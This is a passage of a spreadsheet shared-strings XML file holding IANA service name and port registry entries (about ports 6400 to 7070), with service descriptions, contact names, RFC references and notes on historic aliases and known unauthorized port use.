    <t>[Paul_Sterk]</t>
  </si>
  <si>
    <t>sge-qmaster</t>
  </si>
  <si>
    <t>Grid Engine Qmaster Service
IANA assigned this well-formed service name as a replacement for "sge_qmaster".</t>
  </si>
  <si>
    <t>[Andreas_Haas]</t>
  </si>
  <si>
    <t>sge_qmaster</t>
  </si>
  <si>
    <t>Grid Engine Qmaster Service</t>
  </si>
  <si>
    <t>This entry is an alias to "sge-qmaster".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>sge-execd</t>
  </si>
  <si>
    <t>Grid Engine Execution Service
IANA assigned this well-formed service name as a replacement for "sge_execd".</t>
  </si>
  <si>
    <t>sge_execd</t>
  </si>
  <si>
    <t>Grid Engine Execution Service</t>
  </si>
  <si>
    <t>This entry is an alias to "sge-execd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>mysql-proxy</t>
  </si>
  <si>
    <t>MySQL Proxy</t>
  </si>
  <si>
    <t>[Kay_Roepke]</t>
  </si>
  <si>
    <t>6447-6454</t>
  </si>
  <si>
    <t>skip-cert-recv</t>
  </si>
  <si>
    <t>SKIP Certificate Receive</t>
  </si>
  <si>
    <t>skip-cert-send</t>
  </si>
  <si>
    <t>SKIP Certificate Send</t>
  </si>
  <si>
    <t>6457-6463</t>
  </si>
  <si>
    <t>ieee11073-20701</t>
  </si>
  <si>
    <t>Port assignment for medical device communication in 
    accordance to IEEE 11073-20701</t>
  </si>
  <si>
    <t>[David_Gregorczyk]</t>
  </si>
  <si>
    <t>6465-6470</t>
  </si>
  <si>
    <t>lvision-lm</t>
  </si>
  <si>
    <t>LVision License Manager</t>
  </si>
  <si>
    <t>[Brian_McKinnon]</t>
  </si>
  <si>
    <t>6472-6479</t>
  </si>
  <si>
    <t>sun-sr-http</t>
  </si>
  <si>
    <t>Service Registry Default HTTP Domain</t>
  </si>
  <si>
    <t>servicetags</t>
  </si>
  <si>
    <t>Service Tags</t>
  </si>
  <si>
    <t>[Peter_Schow]</t>
  </si>
  <si>
    <t>ldoms-mgmt</t>
  </si>
  <si>
    <t>Logical Domains Management Interface</t>
  </si>
  <si>
    <t>[Eric_Sharakan]</t>
  </si>
  <si>
    <t>SunVTS-RMI</t>
  </si>
  <si>
    <t>SunVTS RMI</t>
  </si>
  <si>
    <t>[Sumit_Arora]</t>
  </si>
  <si>
    <t>sun-sr-jms</t>
  </si>
  <si>
    <t>Service Registry Default JMS Domain</t>
  </si>
  <si>
    <t>sun-sr-iiop</t>
  </si>
  <si>
    <t>Service Registry Default IIOP Domain</t>
  </si>
  <si>
    <t>sun-sr-iiops</t>
  </si>
  <si>
    <t>Service Registry Default IIOPS Domain</t>
  </si>
  <si>
    <t>sun-sr-iiop-aut</t>
  </si>
  <si>
    <t>Service Registry Default IIOPAuth Domain</t>
  </si>
  <si>
    <t>sun-sr-jmx</t>
  </si>
  <si>
    <t>Service Registry Default JMX Domain</t>
  </si>
  <si>
    <t>sun-sr-admin</t>
  </si>
  <si>
    <t>Service Registry Default Admin Domain</t>
  </si>
  <si>
    <t>6490-6499</t>
  </si>
  <si>
    <t>boks</t>
  </si>
  <si>
    <t>BoKS Master</t>
  </si>
  <si>
    <t>[Magnus_Nystrom]</t>
  </si>
  <si>
    <t>boks-servc</t>
  </si>
  <si>
    <t>BoKS Servc
IANA assigned this well-formed service name as a replacement for "boks_servc".</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 6501</t>
  </si>
  <si>
    <t>boks_servc</t>
  </si>
  <si>
    <t>BoKS Servc</t>
  </si>
  <si>
    <t>This entry is an alias to "boks-servc".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>boks-servm</t>
  </si>
  <si>
    <t>BoKS Servm
IANA assigned this well-formed service name as a replacement for "boks_servm".</t>
  </si>
  <si>
    <t>boks_servm</t>
  </si>
  <si>
    <t>BoKS Servm</t>
  </si>
  <si>
    <t>This entry is an alias to "boks-servm".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>boks-clntd</t>
  </si>
  <si>
    <t>BoKS Clntd
IANA assigned this well-formed service name as a replacement for "boks_clntd".</t>
  </si>
  <si>
    <t>boks_clntd</t>
  </si>
  <si>
    <t>BoKS Clntd</t>
  </si>
  <si>
    <t>This entry is an alias to "boks-clntd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>badm-priv</t>
  </si>
  <si>
    <t>BoKS Admin Private Port
IANA assigned this well-formed service name as a replacement for "badm_priv".</t>
  </si>
  <si>
    <t>badm_priv</t>
  </si>
  <si>
    <t>BoKS Admin Private Port</t>
  </si>
  <si>
    <t>This entry is an alias to "badm-priv".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>badm-pub</t>
  </si>
  <si>
    <t>BoKS Admin Public Port
IANA assigned this well-formed service name as a replacement for "badm_pub".</t>
  </si>
  <si>
    <t>badm_pub</t>
  </si>
  <si>
    <t>BoKS Admin Public Port</t>
  </si>
  <si>
    <t>This entry is an alias to "badm-pub".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>bdir-priv</t>
  </si>
  <si>
    <t>BoKS Dir Server, Private Port
IANA assigned this well-formed service name as a replacement for "bdir_priv".</t>
  </si>
  <si>
    <t>bdir_priv</t>
  </si>
  <si>
    <t>BoKS Dir Server, Private Port</t>
  </si>
  <si>
    <t>This entry is an alias to "bdir-priv".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>bdir-pub</t>
  </si>
  <si>
    <t>BoKS Dir Server, Public Port
IANA assigned this well-formed service name as a replacement for "bdir_pub".</t>
  </si>
  <si>
    <t>bdir_pub</t>
  </si>
  <si>
    <t>BoKS Dir Server, Public Port</t>
  </si>
  <si>
    <t>This entry is an alias to "bdir-pub".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>mgcs-mfp-port</t>
  </si>
  <si>
    <t>MGCS-MFP Port</t>
  </si>
  <si>
    <t>[Minoru_Ozaki]</t>
  </si>
  <si>
    <t>mcer-port</t>
  </si>
  <si>
    <t>MCER Port</t>
  </si>
  <si>
    <t>dccp-udp</t>
  </si>
  <si>
    <t>Datagram Congestion Control Protocol Encapsulation for NAT Traversal</t>
  </si>
  <si>
    <t>[RFC6773]</t>
  </si>
  <si>
    <t>6512-6512</t>
  </si>
  <si>
    <t>netconf-tls</t>
  </si>
  <si>
    <t>NETCONF over TLS</t>
  </si>
  <si>
    <t>[RFC7589]</t>
  </si>
  <si>
    <t>syslog-tls</t>
  </si>
  <si>
    <t>Syslog over TLS</t>
  </si>
  <si>
    <t>[RFC5425]</t>
  </si>
  <si>
    <t>syslog over DTLS</t>
  </si>
  <si>
    <t>[RFC6012]</t>
  </si>
  <si>
    <t>elipse-rec</t>
  </si>
  <si>
    <t>Elipse RPC Protocol</t>
  </si>
  <si>
    <t>[F_Englert]</t>
  </si>
  <si>
    <t>6516-6542</t>
  </si>
  <si>
    <t>lds-distrib</t>
  </si>
  <si>
    <t>lds_distrib</t>
  </si>
  <si>
    <t>[Jack_Baker]</t>
  </si>
  <si>
    <t>lds-dump</t>
  </si>
  <si>
    <t>LDS Dump Service</t>
  </si>
  <si>
    <t>6545-6546</t>
  </si>
  <si>
    <t>apc-6547</t>
  </si>
  <si>
    <t>APC 6547</t>
  </si>
  <si>
    <t>apc-6548</t>
  </si>
  <si>
    <t>APC 6548</t>
  </si>
  <si>
    <t>apc-6549</t>
  </si>
  <si>
    <t>APC 6549</t>
  </si>
  <si>
    <t>fg-sysupdate</t>
  </si>
  <si>
    <t>[Mark_Beyer]</t>
  </si>
  <si>
    <t>sum</t>
  </si>
  <si>
    <t>Software Update Manager</t>
  </si>
  <si>
    <t>[Jan_Dirven]</t>
  </si>
  <si>
    <t>6552-6557</t>
  </si>
  <si>
    <t>xdsxdm</t>
  </si>
  <si>
    <t>possible contact</t>
  </si>
  <si>
    <t>6559-6565</t>
  </si>
  <si>
    <t>sane-port</t>
  </si>
  <si>
    <t>SANE Control Port</t>
  </si>
  <si>
    <t>[Henning_Meier_Geinit]</t>
  </si>
  <si>
    <t>This entry has been removed on 2011-08-26.</t>
  </si>
  <si>
    <t>canit-store</t>
  </si>
  <si>
    <t>CanIt Storage Manager
IANA assigned this well-formed service name as a replacement for "canit_store".</t>
  </si>
  <si>
    <t>[Dianne_Skoll]</t>
  </si>
  <si>
    <t>canit_store</t>
  </si>
  <si>
    <t>CanIt Storage Manager</t>
  </si>
  <si>
    <t>This entry is an alias to "canit-store".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>rp-reputation</t>
  </si>
  <si>
    <t>Roaring Penguin IP Address Reputation Collection</t>
  </si>
  <si>
    <t>6569-6578</t>
  </si>
  <si>
    <t>affiliate</t>
  </si>
  <si>
    <t>Affiliate</t>
  </si>
  <si>
    <t>parsec-master</t>
  </si>
  <si>
    <t>Parsec Masterserver</t>
  </si>
  <si>
    <t>[Andreas_Varga]</t>
  </si>
  <si>
    <t>parsec-peer</t>
  </si>
  <si>
    <t>Parsec Peer-to-Peer</t>
  </si>
  <si>
    <t>parsec-game</t>
  </si>
  <si>
    <t>Parsec Gameserver</t>
  </si>
  <si>
    <t>joaJewelSuite</t>
  </si>
  <si>
    <t>JOA Jewel Suite</t>
  </si>
  <si>
    <t>[Bob_Rundle]</t>
  </si>
  <si>
    <t>6584-6587</t>
  </si>
  <si>
    <t>Unofficial use of port 6588 by AnalogX and Microsoft</t>
  </si>
  <si>
    <t>6589-6599</t>
  </si>
  <si>
    <t>mshvlm</t>
  </si>
  <si>
    <t>Microsoft Hyper-V Live Migration</t>
  </si>
  <si>
    <t>[Rajesh_D]</t>
  </si>
  <si>
    <t>mstmg-sstp</t>
  </si>
  <si>
    <t>Microsoft Threat Management Gateway SSTP</t>
  </si>
  <si>
    <t>[Ori_Yosefi]</t>
  </si>
  <si>
    <t>wsscomfrmwk</t>
  </si>
  <si>
    <t>Windows WSS Communication Framework</t>
  </si>
  <si>
    <t>[Rong_Yu]</t>
  </si>
  <si>
    <t>6603-6618</t>
  </si>
  <si>
    <t>odette-ftps</t>
  </si>
  <si>
    <t>ODETTE-FTP over TLS/SSL</t>
  </si>
  <si>
    <t>[Ieuan_Friend]</t>
  </si>
  <si>
    <t>kftp-data</t>
  </si>
  <si>
    <t>Kerberos V5 FTP Data</t>
  </si>
  <si>
    <t>[Robert_J_Scott]</t>
  </si>
  <si>
    <t>kftp</t>
  </si>
  <si>
    <t>Kerberos V5 FTP Control</t>
  </si>
  <si>
    <t>mcftp</t>
  </si>
  <si>
    <t>Multicast FTP</t>
  </si>
  <si>
    <t>[Bruce_Lueckenhoff_2]</t>
  </si>
  <si>
    <t>ktelnet</t>
  </si>
  <si>
    <t>Kerberos V5 Telnet</t>
  </si>
  <si>
    <t>datascaler-db</t>
  </si>
  <si>
    <t>DataScaler database</t>
  </si>
  <si>
    <t>[Vasu_Murthy]</t>
  </si>
  <si>
    <t>datascaler-ctl</t>
  </si>
  <si>
    <t>DataScaler control</t>
  </si>
  <si>
    <t>wago-service</t>
  </si>
  <si>
    <t>WAGO Service and Update</t>
  </si>
  <si>
    <t>[Wolfgang_Adler]</t>
  </si>
  <si>
    <t>nexgen</t>
  </si>
  <si>
    <t>Allied Electronics NeXGen</t>
  </si>
  <si>
    <t>[Lou_Seitchik]</t>
  </si>
  <si>
    <t>afesc-mc</t>
  </si>
  <si>
    <t>AFE Stock Channel M/C</t>
  </si>
  <si>
    <t>[K_K_Ho]</t>
  </si>
  <si>
    <t>nexgen-aux</t>
  </si>
  <si>
    <t>Secondary, (non ANDI) multi-protocol multi-function interface to
    the Allied ANDI-based family of forecourt controllers</t>
  </si>
  <si>
    <t>[Allied_Electronics]</t>
  </si>
  <si>
    <t>[Robert_E_Tomenchok_Jr]</t>
  </si>
  <si>
    <t>Secondary, (non ANDI) multi-protocol multi-function interface to
      the Allied ANDI-based family of forecourt controllers</t>
  </si>
  <si>
    <t>mxodbc-connect</t>
  </si>
  <si>
    <t>eGenix mxODBC Connect</t>
  </si>
  <si>
    <t>[Marc_Andre_Lemburg]</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 6632</t>
  </si>
  <si>
    <t>cisco-vpath-tun</t>
  </si>
  <si>
    <t>Cisco vPath Services Overlay</t>
  </si>
  <si>
    <t>[Cisco2]</t>
  </si>
  <si>
    <t>[Surendra_Kumar]</t>
  </si>
  <si>
    <t>mpls-pm</t>
  </si>
  <si>
    <t>MPLS Performance Measurement out-of-band response</t>
  </si>
  <si>
    <t>[Cisco_Systems_2]</t>
  </si>
  <si>
    <t>[Sagar_Soni]</t>
  </si>
  <si>
    <t>mpls-udp</t>
  </si>
  <si>
    <t>Encapsulate MPLS packets in UDP tunnels.</t>
  </si>
  <si>
    <t>[RFC7510]</t>
  </si>
  <si>
    <t>mpls-udp-dtls</t>
  </si>
  <si>
    <t>Encapsulate MPLS packets in UDP tunnels with DTLS.</t>
  </si>
  <si>
    <t>6637-6639</t>
  </si>
  <si>
    <t>ovsdb</t>
  </si>
  <si>
    <t>Open vSwitch Database protocol</t>
  </si>
  <si>
    <t>[Bruce_Davie_2]</t>
  </si>
  <si>
    <t>[RFC7047]</t>
  </si>
  <si>
    <t>6641-6652</t>
  </si>
  <si>
    <t>openflow</t>
  </si>
  <si>
    <t>OpenFlow</t>
  </si>
  <si>
    <t>[Open_Networking_Foundation]</t>
  </si>
  <si>
    <t>[Puneet_Agarwal]</t>
  </si>
  <si>
    <t>pcs-sf-ui-man</t>
  </si>
  <si>
    <t>PC SOFT - Software factory UI/manager</t>
  </si>
  <si>
    <t>[Jerome_AERTS]</t>
  </si>
  <si>
    <t>emgmsg</t>
  </si>
  <si>
    <t>Emergency Message Control Service</t>
  </si>
  <si>
    <t>[Gerry_Gorman]</t>
  </si>
  <si>
    <t>palcom-disc</t>
  </si>
  <si>
    <t>PalCom Discovery</t>
  </si>
  <si>
    <t>[Boris_Magnusson]</t>
  </si>
  <si>
    <t>6658-6664</t>
  </si>
  <si>
    <t>Unauthorized Use Known on Port 6659</t>
  </si>
  <si>
    <t>ircu</t>
  </si>
  <si>
    <t>6665-6669</t>
  </si>
  <si>
    <t>IRCU</t>
  </si>
  <si>
    <t>vocaltec-gold</t>
  </si>
  <si>
    <t>Vocaltec Global Online Directory</t>
  </si>
  <si>
    <t>p4p-portal</t>
  </si>
  <si>
    <t>P4P Portal Service</t>
  </si>
  <si>
    <t>[Chris_Griffiths]</t>
  </si>
  <si>
    <t>vision-server</t>
  </si>
  <si>
    <t>vision_server
IANA assigned this well-formed service name as a replacement for "vision_server".</t>
  </si>
  <si>
    <t>[Chris_Kramer]</t>
  </si>
  <si>
    <t>vision_server</t>
  </si>
  <si>
    <t>This entry is an alias to "vision-server".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>vision-elmd</t>
  </si>
  <si>
    <t>vision_elmd
IANA assigned this well-formed service name as a replacement for "vision_elmd".</t>
  </si>
  <si>
    <t>vision_elmd</t>
  </si>
  <si>
    <t>This entry is an alias to "vision-elmd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>6674-6677</t>
  </si>
  <si>
    <t>vfbp</t>
  </si>
  <si>
    <t>Viscount Freedom Bridge Protocol</t>
  </si>
  <si>
    <t>[Chris_MacDonald]</t>
  </si>
  <si>
    <t>vfbp-disc</t>
  </si>
  <si>
    <t>Viscount Freedom Bridge Discovery</t>
  </si>
  <si>
    <t>osaut</t>
  </si>
  <si>
    <t>Osorno Automation</t>
  </si>
  <si>
    <t>[Peter_Hombach]</t>
  </si>
  <si>
    <t>6680-6686</t>
  </si>
  <si>
    <t>clever-ctrace</t>
  </si>
  <si>
    <t>CleverView for cTrace Message Service</t>
  </si>
  <si>
    <t>[David_Cheng]</t>
  </si>
  <si>
    <t>clever-tcpip</t>
  </si>
  <si>
    <t>CleverView for TCP/IP Message Service</t>
  </si>
  <si>
    <t>tsa</t>
  </si>
  <si>
    <t>Tofino Security Appliance</t>
  </si>
  <si>
    <t>[Scott_Howard]</t>
  </si>
  <si>
    <t>cleverdetect</t>
  </si>
  <si>
    <t>CLEVERDetect Message Service</t>
  </si>
  <si>
    <t>[Applied_Expert_Systems_Inc]</t>
  </si>
  <si>
    <t>6691-6695</t>
  </si>
  <si>
    <t>babel</t>
  </si>
  <si>
    <t>Babel Routing Protocol</t>
  </si>
  <si>
    <t>[RFC6126]</t>
  </si>
  <si>
    <t>ircs-u</t>
  </si>
  <si>
    <t>Internet Relay Chat via TLS/SSL</t>
  </si>
  <si>
    <t>[RFC7194]</t>
  </si>
  <si>
    <t>6698-6699</t>
  </si>
  <si>
    <t>kti-icad-srvr</t>
  </si>
  <si>
    <t>KTI/ICAD Nameserver</t>
  </si>
  <si>
    <t>[Stanley_Knutson]</t>
  </si>
  <si>
    <t>e-design-net</t>
  </si>
  <si>
    <t>e-Design network</t>
  </si>
  <si>
    <t>[Janos_Lerch]</t>
  </si>
  <si>
    <t>e-design-web</t>
  </si>
  <si>
    <t>e-Design web</t>
  </si>
  <si>
    <t>frc-hp</t>
  </si>
  <si>
    <t>ForCES HP (High Priority) channel</t>
  </si>
  <si>
    <t>[RFC5811]</t>
  </si>
  <si>
    <t>frc-mp</t>
  </si>
  <si>
    <t>ForCES MP (Medium Priority) channel</t>
  </si>
  <si>
    <t>frc-lp</t>
  </si>
  <si>
    <t>ForCES LP (Low priority) channel</t>
  </si>
  <si>
    <t>6707-6713</t>
  </si>
  <si>
    <t>ibprotocol</t>
  </si>
  <si>
    <t>Internet Backplane Protocol</t>
  </si>
  <si>
    <t>[Alessandro_Bassi]</t>
  </si>
  <si>
    <t>fibotrader-com</t>
  </si>
  <si>
    <t>Fibotrader Communications</t>
  </si>
  <si>
    <t>[Robert_Wetzold]</t>
  </si>
  <si>
    <t>princity-agent</t>
  </si>
  <si>
    <t>Princity Agent</t>
  </si>
  <si>
    <t>[ENSTEAM_Sp_z.o.o.]</t>
  </si>
  <si>
    <t>[Tomasz_Krakowiak]</t>
  </si>
  <si>
    <t>6717-6766</t>
  </si>
  <si>
    <t>bmc-perf-agent</t>
  </si>
  <si>
    <t>BMC PERFORM AGENT</t>
  </si>
  <si>
    <t>bmc-perf-mgrd</t>
  </si>
  <si>
    <t>BMC PERFORM MGRD</t>
  </si>
  <si>
    <t>adi-gxp-srvprt</t>
  </si>
  <si>
    <t>ADInstruments GxP Server</t>
  </si>
  <si>
    <t>[Mathew_Pitchforth]</t>
  </si>
  <si>
    <t>plysrv-http</t>
  </si>
  <si>
    <t>PolyServe http</t>
  </si>
  <si>
    <t>[Mike_Spitzer]</t>
  </si>
  <si>
    <t>plysrv-https</t>
  </si>
  <si>
    <t>PolyServe https</t>
  </si>
  <si>
    <t>6772-6776</t>
  </si>
  <si>
    <t>ntz-tracker</t>
  </si>
  <si>
    <t>netTsunami Tracker</t>
  </si>
  <si>
    <t>[Tomahawk_Holdings]</t>
  </si>
  <si>
    <t>[Sagara_Wijetunga]</t>
  </si>
  <si>
    <t>ntz-p2p-storage</t>
  </si>
  <si>
    <t>netTsunami p2p storage system</t>
  </si>
  <si>
    <t>6779-6783</t>
  </si>
  <si>
    <t>bfd-lag</t>
  </si>
  <si>
    <t>Bidirectional Forwarding Detection (BFD) on Link Aggregation Group (LAG) Interfaces</t>
  </si>
  <si>
    <t>[BFD_Chairs]</t>
  </si>
  <si>
    <t>[RFC7130]</t>
  </si>
  <si>
    <t>dgpf-exchg</t>
  </si>
  <si>
    <t>DGPF Individual Exchange</t>
  </si>
  <si>
    <t>[Thomas_Weise]</t>
  </si>
  <si>
    <t>smc-jmx</t>
  </si>
  <si>
    <t>Sun Java Web Console JMX</t>
  </si>
  <si>
    <t>[Bill_Edwards]</t>
  </si>
  <si>
    <t>smc-admin</t>
  </si>
  <si>
    <t>Sun Web Console Admin</t>
  </si>
  <si>
    <t>smc-http</t>
  </si>
  <si>
    <t>SMC-HTTP</t>
  </si>
  <si>
    <t>[Ratnadeep_Bhattachar]</t>
  </si>
  <si>
    <t>radg</t>
  </si>
  <si>
    <t>GSS-API for the Oracle Remote Administration Daemon</t>
  </si>
  <si>
    <t>[Oracle_9]</t>
  </si>
  <si>
    <t>[Shawn_Emery]</t>
  </si>
  <si>
    <t>hnmp</t>
  </si>
  <si>
    <t>HNMP</t>
  </si>
  <si>
    <t>[Jude_George]</t>
  </si>
  <si>
    <t>hnm</t>
  </si>
  <si>
    <t>Halcyon Network Manager</t>
  </si>
  <si>
    <t>[Richard_Harriss]</t>
  </si>
  <si>
    <t>6792-6800</t>
  </si>
  <si>
    <t>acnet</t>
  </si>
  <si>
    <t>ACNET Control System Protocol</t>
  </si>
  <si>
    <t>[Fermilab]</t>
  </si>
  <si>
    <t>[Rich_Neswold]</t>
  </si>
  <si>
    <t>6802-6816</t>
  </si>
  <si>
    <t>pentbox-sim</t>
  </si>
  <si>
    <t>PenTBox Secure IM Protocol</t>
  </si>
  <si>
    <t>[Alberto_Ortega_Llama]</t>
  </si>
  <si>
    <t>6818-6830</t>
  </si>
  <si>
    <t>ambit-lm</t>
  </si>
  <si>
    <t>[Don_Hejna]</t>
  </si>
  <si>
    <t>6832-6840</t>
  </si>
  <si>
    <t>netmo-default</t>
  </si>
  <si>
    <t>Netmo Default</t>
  </si>
  <si>
    <t>[Urs_Bertschinger]</t>
  </si>
  <si>
    <t>netmo-http</t>
  </si>
  <si>
    <t>Netmo HTTP</t>
  </si>
  <si>
    <t>6843-6849</t>
  </si>
  <si>
    <t>iccrushmore</t>
  </si>
  <si>
    <t>ICCRUSHMORE</t>
  </si>
  <si>
    <t>[Dave_Hubbard]</t>
  </si>
  <si>
    <t>6851-6867</t>
  </si>
  <si>
    <t>acctopus-cc</t>
  </si>
  <si>
    <t>Acctopus Command Channel</t>
  </si>
  <si>
    <t>[Stefan_Auweiler]</t>
  </si>
  <si>
    <t>acctopus-st</t>
  </si>
  <si>
    <t>Acctopus Status</t>
  </si>
  <si>
    <t>6869-6887</t>
  </si>
  <si>
    <t>muse</t>
  </si>
  <si>
    <t>MUSE</t>
  </si>
  <si>
    <t>[Muse_Communications]</t>
  </si>
  <si>
    <t>6889-6899</t>
  </si>
  <si>
    <t>rtimeviewer</t>
  </si>
  <si>
    <t>R*TIME Viewer Data Interface</t>
  </si>
  <si>
    <t>[Curtiss-Wright_Corporation]</t>
  </si>
  <si>
    <t>[Robert_Ammon]</t>
  </si>
  <si>
    <t>jetstream</t>
  </si>
  <si>
    <t>Novell Jetstream messaging protocol</t>
  </si>
  <si>
    <t>[Anil_Tyagi]</t>
  </si>
  <si>
    <t>6902-6923</t>
  </si>
  <si>
    <t>split-ping</t>
  </si>
  <si>
    <t>Ping with RX/TX latency/loss split</t>
  </si>
  <si>
    <t>[Ben_Cartwright_Cox]</t>
  </si>
  <si>
    <t>6925-6934</t>
  </si>
  <si>
    <t>ethoscan</t>
  </si>
  <si>
    <t>EthoScan Service</t>
  </si>
  <si>
    <t>[Marty_Campbell]</t>
  </si>
  <si>
    <t>xsmsvc</t>
  </si>
  <si>
    <t>XenSource Management Service</t>
  </si>
  <si>
    <t>[Roger_Klorese]</t>
  </si>
  <si>
    <t>6937-6945</t>
  </si>
  <si>
    <t>bioserver</t>
  </si>
  <si>
    <t>Biometrics Server</t>
  </si>
  <si>
    <t>[ISHII_AKIO]</t>
  </si>
  <si>
    <t>6947-6950</t>
  </si>
  <si>
    <t>otlp</t>
  </si>
  <si>
    <t>OTLP</t>
  </si>
  <si>
    <t>6952-6960</t>
  </si>
  <si>
    <t>jmact3</t>
  </si>
  <si>
    <t>JMACT3</t>
  </si>
  <si>
    <t>jmevt2</t>
  </si>
  <si>
    <t>swismgr1</t>
  </si>
  <si>
    <t>swismgr2</t>
  </si>
  <si>
    <t>swistrap</t>
  </si>
  <si>
    <t>swispol</t>
  </si>
  <si>
    <t>6967-6968</t>
  </si>
  <si>
    <t>acmsoda</t>
  </si>
  <si>
    <t>[Daniel_Simms]</t>
  </si>
  <si>
    <t>conductor</t>
  </si>
  <si>
    <t>Conductor test coordination protocol</t>
  </si>
  <si>
    <t>[George_Neville-Neil]</t>
  </si>
  <si>
    <t>conductor-mpx</t>
  </si>
  <si>
    <t>conductor for multiplex</t>
  </si>
  <si>
    <t>6971-6996</t>
  </si>
  <si>
    <t>MobilitySrv</t>
  </si>
  <si>
    <t>Mobility XE Protocol</t>
  </si>
  <si>
    <t>[Joseph_T_Savarese]</t>
  </si>
  <si>
    <t>iatp-highpri</t>
  </si>
  <si>
    <t>IATP-highPri</t>
  </si>
  <si>
    <t>[John_Murphy]</t>
  </si>
  <si>
    <t>iatp-normalpri</t>
  </si>
  <si>
    <t>IATP-normalPri</t>
  </si>
  <si>
    <t>afs3-fileserver</t>
  </si>
  <si>
    <t>file server itself</t>
  </si>
  <si>
    <t>afs3-callback</t>
  </si>
  <si>
    <t>callbacks to cache managers</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7001</t>
  </si>
  <si>
    <t>afs3-prserver</t>
  </si>
  <si>
    <t>users &amp; groups database</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7002</t>
  </si>
  <si>
    <t>afs3-vlserver</t>
  </si>
  <si>
    <t>volume location database</t>
  </si>
  <si>
    <t>afs3-kaserver</t>
  </si>
  <si>
    <t>AFS/Kerberos authentication service</t>
  </si>
  <si>
    <t>afs3-volser</t>
  </si>
  <si>
    <t>volume managment server</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7005</t>
  </si>
  <si>
    <t>afs3-errors</t>
  </si>
  <si>
    <t>error interpretation service</t>
  </si>
  <si>
    <t>afs3-bos</t>
  </si>
  <si>
    <t>basic overseer process</t>
  </si>
  <si>
    <t>afs3-update</t>
  </si>
  <si>
    <t>server-to-server updater</t>
  </si>
  <si>
    <t>afs3-rmtsys</t>
  </si>
  <si>
    <t>remote cache manager service</t>
  </si>
  <si>
    <t>ups-onlinet</t>
  </si>
  <si>
    <t>onlinet uninterruptable power supplies</t>
  </si>
  <si>
    <t>talon-disc</t>
  </si>
  <si>
    <t>Talon Discovery Port</t>
  </si>
  <si>
    <t>Known Unauthorized Use on 7011</t>
  </si>
  <si>
    <t>talon-engine</t>
  </si>
  <si>
    <t>Talon Engine</t>
  </si>
  <si>
    <t>microtalon-dis</t>
  </si>
  <si>
    <t>Microtalon Discovery</t>
  </si>
  <si>
    <t>microtalon-com</t>
  </si>
  <si>
    <t>Microtalon Communications</t>
  </si>
  <si>
    <t>talon-webserver</t>
  </si>
  <si>
    <t>Talon Webserver</t>
  </si>
  <si>
    <t>spg</t>
  </si>
  <si>
    <t>SPG Controls Carrier</t>
  </si>
  <si>
    <t>[SPG_Controls_Ltd]</t>
  </si>
  <si>
    <t>[Steve_Barton_2]</t>
  </si>
  <si>
    <t>grasp</t>
  </si>
  <si>
    <t>GeneRic Autonomic Signaling Protocol</t>
  </si>
  <si>
    <t>[RFC-ietf-anima-grasp-15]</t>
  </si>
  <si>
    <t>fisa-svc</t>
  </si>
  <si>
    <t>FISA Service</t>
  </si>
  <si>
    <t>[FAUCONNET_Ingenierie]</t>
  </si>
  <si>
    <t>doceri-ctl</t>
  </si>
  <si>
    <t>doceri drawing service control</t>
  </si>
  <si>
    <t>[Paul_Brown]</t>
  </si>
  <si>
    <t>doceri-view</t>
  </si>
  <si>
    <t>doceri drawing service screen view</t>
  </si>
  <si>
    <t>dpserve</t>
  </si>
  <si>
    <t>DP Serve</t>
  </si>
  <si>
    <t>[Allan_Stanley]</t>
  </si>
  <si>
    <t>dpserveadmin</t>
  </si>
  <si>
    <t>DP Serve Admin</t>
  </si>
  <si>
    <t>ctdp</t>
  </si>
  <si>
    <t>CT Discovery Protocol</t>
  </si>
  <si>
    <t>[James_Kirkwood]</t>
  </si>
  <si>
    <t>ct2nmcs</t>
  </si>
  <si>
    <t>Comtech T2 NMCS</t>
  </si>
  <si>
    <t>[Bryan_Wilcutt]</t>
  </si>
  <si>
    <t>vmsvc</t>
  </si>
  <si>
    <t>Vormetric service</t>
  </si>
  <si>
    <t>[Tom_Boyle]</t>
  </si>
  <si>
    <t>vmsvc-2</t>
  </si>
  <si>
    <t>Vormetric Service II</t>
  </si>
  <si>
    <t>loreji-panel</t>
  </si>
  <si>
    <t>Loreji Webhosting Panel</t>
  </si>
  <si>
    <t>[J.A._Smit]</t>
  </si>
  <si>
    <t>[DALTCORE]</t>
  </si>
  <si>
    <t>7027-7029</t>
  </si>
  <si>
    <t>op-probe</t>
  </si>
  <si>
    <t>ObjectPlanet probe</t>
  </si>
  <si>
    <t>[Bjorn_Jarle_Kvande]</t>
  </si>
  <si>
    <t>iposplanet</t>
  </si>
  <si>
    <t>IPOSPLANET retailing multi devices protocol</t>
  </si>
  <si>
    <t>[Fabrice_Paget]</t>
  </si>
  <si>
    <t>7032-7039</t>
  </si>
  <si>
    <t>quest-disc</t>
  </si>
  <si>
    <t>Quest application level network service discovery</t>
  </si>
  <si>
    <t>[Quest_Software]</t>
  </si>
  <si>
    <t>[Henrik_Johnson]</t>
  </si>
  <si>
    <t>7041-7069</t>
  </si>
  <si>
    <t>arcp</t>
  </si>
  <si>
    <t>ARCP</t>
  </si>
  <si>
    <t>iwg1</t>
  </si>
  <si>
    <t>IWGADTS Aircraft Housekeeping Message</t>
  </si>
  <si>
    <t>[Don_Sullivan]</t>
  </si>
  <si>
    <t>iba-cfg</t>
  </si>
  <si>
    <t>iba Device Configuration Protocol</t>
  </si>
  <si>
